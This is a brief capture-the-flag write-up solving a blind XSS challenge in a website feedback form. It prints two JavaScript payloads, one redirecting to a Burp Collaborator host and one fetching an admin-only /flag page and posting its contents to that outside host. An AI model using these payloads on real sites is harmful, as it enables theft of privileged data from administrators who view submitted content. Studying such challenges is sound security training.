bxxs
by shreyas-sriram
We’ve made some new epic updates to our website. Could you send us some feedback on it ?
link - bxxs
Solution
- The website contains a form which accepts feedback and sends it to the admin
- A quick check for blind XSS (clue from the challenge name?!) confirms the vulnerability
<script>
location="//leet.burpcollaborator.net/";
</script>
- Attempts to read the admin cookie failed because of
httpOnly cookies - Another endpoint was
foundguessed (ctfs, duh),/flag, however only the admin can view the contents - The following payload can be used to obtain the flag
<script>
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4) {
var req = new XMLHttpRequest();
req.open("POST", "http://leet.burpcollaborator.net/givemeflag?c="+window.location.href,true);
req.send(xhttp.responseText);
}
};
xhttp.open("GET", "http://0.0.0.0:8080/flag", true);
xhttp.send();
</script>
Flag
zh3r0